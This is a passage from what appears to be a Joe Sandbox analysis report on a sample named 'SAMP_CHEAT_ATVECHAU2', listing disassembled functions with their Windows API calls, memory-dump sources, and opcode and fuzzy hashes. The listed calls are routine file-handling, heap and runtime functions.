                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc
                                                    • API String ID: 2773662609-671089009
                                                    • Opcode ID: f07a039b820a147d9039a3ec5378efc49780461efee380255f2fdcf8ebfaba92
                                                    • Instruction ID: 8b1627c6e2418d832540b4c720b3f47bfb124ec7a2fe658e18b9be0e6bd8af39
                                                    • Opcode Fuzzy Hash: f07a039b820a147d9039a3ec5378efc49780461efee380255f2fdcf8ebfaba92
                                                    • Instruction Fuzzy Hash: 63E0E531786328BBC621AB69FC129AEBB54DB24721B010199F80597340DD745E828AFA
                                                    Function 00D1BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D1B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D1BA44,?), ref: 00D1B7E6
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D1BA89,?,00000000), ref: 00D1BC64
                                                    • GetCPInfo.KERNEL32(00000000,00D1BA89,?,?,?,00D1BA89,?,00000000), ref: 00D1BC77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: 3165bf09af5e9c558770f2a8a215e60665e9c8edd0eef41d5d12a2b98783f610
                                                    • Instruction ID: d22a55ca96997a67ae9f4b97e0e4f0b90e2f92e2b48465d0c464d7306bc2b946
                                                    • Opcode Fuzzy Hash: 3165bf09af5e9c558770f2a8a215e60665e9c8edd0eef41d5d12a2b98783f610
                                                    • Instruction Fuzzy Hash: 8C512770900345AEDB248F75E4816FABBE5EF51320F18446FD4968B291DF359585CBB0
                                                    Function 00CF9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CF9A50,?,?,00000000,?,?,00CF8CBC,?), ref: 00CF9BAB
                                                    • GetLastError.KERNEL32(?,00000000,00CF8411,-00009570,00000000,000007F3), ref: 00CF9BB6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 13eb3e5f6acaed14b00c44492e26ce2319c3b55b46d1f9c5a124818a77f69bc7
                                                    • Instruction ID: 47b907d06ff74a25dcafc1405005d95793fb8bbc08d957eb11ca84e6225da4a7
                                                    • Opcode Fuzzy Hash: 13eb3e5f6acaed14b00c44492e26ce2319c3b55b46d1f9c5a124818a77f69bc7
                                                    • Instruction Fuzzy Hash: C341BE316043098BDF74DF15E58467AB7E5FFD4310F148A2DEAA183260D770EE458A62
                                                    Function 00D1BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D197E5: GetLastError.KERNEL32(?,00D31030,00D14674,00D31030,?,?,00D13F73,00000050,?,00D31030,00000200), ref: 00D197E9
                                                      • Part of subcall function 00D197E5: _free.LIBCMT ref: 00D1981C
                                                      • Part of subcall function 00D197E5: SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D1985D
                                                      • Part of subcall function 00D197E5: _abort.LIBCMT ref: 00D19863
                                                      • Part of subcall function 00D1BB4E: _abort.LIBCMT ref: 00D1BB80
                                                      • Part of subcall function 00D1BB4E: _free.LIBCMT ref: 00D1BBB4
                                                      • Part of subcall function 00D1B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D1BA44,?), ref: 00D1B7E6
                                                    • _free.LIBCMT ref: 00D1BA9F
                                                    • _free.LIBCMT ref: 00D1BAD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast_abort
                                                    • String ID:
                                                    • API String ID: 2991157371-0
                                                    • Opcode ID: d170a89c6eb21361d8bd3540684e1f3b73bca95325781acf3512e801e5b51dac
                                                    • Instruction ID: 657bc012a53d43fbdd6f9bba69c9d6d4b1597204aac95f0d04e8b97080cc5716
                                                    • Opcode Fuzzy Hash: d170a89c6eb21361d8bd3540684e1f3b73bca95325781acf3512e801e5b51dac
                                                    • Instruction Fuzzy Hash: 89318131904209BFDB10DBA8E541AD9B7E5EF50330F25409AE9049B2A2EF729D81DB70
                                                    Function 00CF1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF1E55
                                                      • Part of subcall function 00CF3BBA: __EH_prolog.LIBCMT ref: 00CF3BBF
                                                    • _wcslen.LIBCMT ref: 00CF1EFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$_wcslen
                                                    • String ID:
                                                    • API String ID: 2838827086-0
                                                    • Opcode ID: f9cba53358dfe5867c5ab43e4cc46d3e2671bb50688237f3c3faa131c31315c9
                                                    • Instruction ID: b36a3309ec9d1b679d459012e349a737cbc3e346752a8bcfe562f681b6293774
                                                    • Opcode Fuzzy Hash: f9cba53358dfe5867c5ab43e4cc46d3e2671bb50688237f3c3faa131c31315c9
                                                    • Instruction Fuzzy Hash: F0314971904209EFCF55DF99D955AEEBBF6EF08300F24006AF989A7291CB325E40DB61
                                                    Function 00CF9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CF73BC,?,?,?,00000000), ref: 00CF9DBC
                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CF9E70
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: d6a588749ee8074a8937bf06c2f7eb6746bf99d36b01c5c140bd4956f0398b4d
                                                    • Instruction ID: d9eab35c79d042934182f6f0be27e0af22ecf26dfa0c60d9c738beba22fa331b
                                                    • Opcode Fuzzy Hash: d6a588749ee8074a8937bf06c2f7eb6746bf99d36b01c5c140bd4956f0398b4d
                                                    • Instruction Fuzzy Hash: BB21EE31248349ABCB14CF64C891BBABBE8EF91304F08481DF5E583191D338EA0D8B62
                                                    Function 00CF966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CF9F27,?,?,00CF771A), ref: 00CF96E6
                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CF9F27,?,?,00CF771A), ref: 00CF9716
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 8f7f71303c8a5835ea5f73358c6c07c6a5e8e756a592bb6c30c41d45c622d872
                                                    • Instruction ID: e3ea4af901d82aeed56373bbf094d4cda39188d912cfd80fa59843e24d322b77
                                                    • Opcode Fuzzy Hash: 8f7f71303c8a5835ea5f73358c6c07c6a5e8e756a592bb6c30c41d45c622d872
                                                    • Instruction Fuzzy Hash: 6321D0711003486FE7B09A65CC89FF7B7DCEB59325F000A19FAE5C21D1C778A9849672
                                                    Function 00CF9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CF9EC7
                                                    • GetLastError.KERNEL32 ref: 00CF9ED4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 549d292b77e6e50338803d4b1780aff314592df0d6d2701d75f88c24a3030a0f
                                                    • Instruction ID: b102e513f614511230b58012b0b70f1946485ce647c094a7eabe2bdb470caa59
                                                    • Opcode Fuzzy Hash: 549d292b77e6e50338803d4b1780aff314592df0d6d2701d75f88c24a3030a0f
                                                    • Instruction Fuzzy Hash: 00110C306007089BDB78DA25CC80BB6B7E8EB45370F504629E263D26E0D770EE49C771
                                                    Function 00D18E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00D18E75
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D31098,00CF17CE,?,?,00000007,?,?,?,00CF13D6,?,00000000), ref: 00D18EB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocAllocate_free
                                                    • String ID:
                                                    • API String ID: 2447670028-0
                                                    • Opcode ID: bc17f2963b940c904d329ffefd5f1995a0c1166291ab8aad6c86c1d9d7171905
                                                    • Instruction ID: a08b0eca56185254871e75c1252c42198321f93f5b31b1c2f5427dc6b450f8ef
                                                    • Opcode Fuzzy Hash: bc17f2963b940c904d329ffefd5f1995a0c1166291ab8aad6c86c1d9d7171905
                                                    • Instruction Fuzzy Hash: 5CF0C2327012017ACB21EA25BC04BEF7758CF82B70F284125F928A6191DF63CDC0B1B0
                                                    Function 00D0109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00D010AB
                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D010B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 5b65f5f1e251ca9d4440295c1c7610995ca42e164e36eaaee264f5a086912338
                                                    • Instruction ID: 03cb2265af41024c8323d7feada482eacebce32ec2c9baa0d610e635d8cfa841
                                                    • Opcode Fuzzy Hash: 5b65f5f1e251ca9d4440295c1c7610995ca42e164e36eaaee264f5a086912338
                                                    • Instruction Fuzzy Hash: D0E0D836F00249A7CF198BB49C05AEB73DDEA543043144175E447D3281F934DE424670
                                                    Function 00D18268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D1BF30: GetEnvironmentStringsW.KERNEL32 ref: 00D1BF39
                                                      • Part of subcall function 00D1BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1BF5C
                                                      • Part of subcall function 00D1BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1BF82
                                                      • Part of subcall function 00D1BF30: _free.LIBCMT ref: 00D1BF95
                                                      • Part of subcall function 00D1BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1BFA4
                                                    • _free.LIBCMT ref: 00D182AE
                                                    • _free.LIBCMT ref: 00D182B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                    • String ID:
                                                    • API String ID: 400815659-0
                                                    • Opcode ID: c4c58e9e306b1db100b55845ef26545380539bd112d2c7418b54a7a93f806d46
                                                    • Instruction ID: 1b56e2a609ca14a06360620f822927658cbf7581f367c2b3cef55ba2a610e580
                                                    • Opcode Fuzzy Hash: c4c58e9e306b1db100b55845ef26545380539bd112d2c7418b54a7a93f806d46
                                                    • Instruction Fuzzy Hash: 74E0E527A09A52759A62B2393C426EF0600CF92379B14021AFD10CB1D3CF2089C665BE
                                                    Function 00CFA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: aca39efc36499216df50056b09ceb46865c9b299f486b97bb36ad4f8369a0d26
                                                    • Instruction ID: c6bdff8ed26366bdbdbd24de9ee76f574c5a2e1137a7dbb0f79e717027845f13
                                                    • Opcode Fuzzy Hash: aca39efc36499216df50056b09ceb46865c9b299f486b97bb36ad4f8369a0d26
                                                    • Instruction Fuzzy Hash: F1F0A93220030DBBEF015FA0DC01FEA376DBB14385F488060BA48D6260DB31CAD9EB65
                                                    Function 00CFA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641,000000FF), ref: 00CFA1F1
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641), ref: 00CFA21F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2643169976-0
                                                    • Opcode ID: e796effd0266fac60b6b7dc7071cd882a77fb1e73e92a049fb15521a60e8cb4c
                                                    • Instruction ID: b10d8a69d3fd7ba29b6ad2f04c61014a606b720eccfcc6818b39533de953f90e
                                                    • Opcode Fuzzy Hash: e796effd0266fac60b6b7dc7071cd882a77fb1e73e92a049fb15521a60e8cb4c
                                                    • Instruction Fuzzy Hash: F3E092712502096BEB115F60DC45FE9779CAB183C2F484021BA48D2150EB61DEC5DA75
                                                    Function 00D0AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00D22641,000000FF), ref: 00D0ACB0
                                                    • CoUninitialize.COMBASE(?,?,?,?,00D22641,000000FF), ref: 00D0ACB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: GdiplusShutdownUninitialize
                                                    • String ID:
                                                    • API String ID: 3856339756-0
                                                    • Opcode ID: 869542d8bf6581d7a80a5fe9e4e27532b19e44d78bdde314e9fa785c23d6c571
                                                    • Instruction ID: 90d812be2ac2db9240ba133bdc96c90907c84c42fe4ecef0976600294c0d0898
                                                    • Opcode Fuzzy Hash: 869542d8bf6581d7a80a5fe9e4e27532b19e44d78bdde314e9fa785c23d6c571
                                                    • Instruction Fuzzy Hash: 08E06D72604B50EFCB11DB58DC06B49FBA9FB88B20F00426AF416D37B0CB74A801CAA4
                                                    Function 00CFA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00CFA23A,?,00CF755C,?,?,?,?), ref: 00CFA254
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CFA23A,?,00CF755C,?,?,?,?), ref: 00CFA280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile$_wcslen
                                                    • String ID:
                                                    • API String ID: 2673547680-0
                                                    • Opcode ID: 6a83da29082318347c690cd099848b309893476f41000fb9880657108e45488c
                                                    • Instruction ID: 12d6375fcf6d8bc0a145274ee35d18a29bf4280afe33eb4d80a76a9397de337a
                                                    • Opcode Fuzzy Hash: 6a83da29082318347c690cd099848b309893476f41000fb9880657108e45488c
                                                    • Instruction Fuzzy Hash: 6FE092725002285BCB60AB64CC05BE9B758AB183E1F044261FE58E3290D771DE85CAF1
                                                    Function 00D0DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00D0DEEC
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
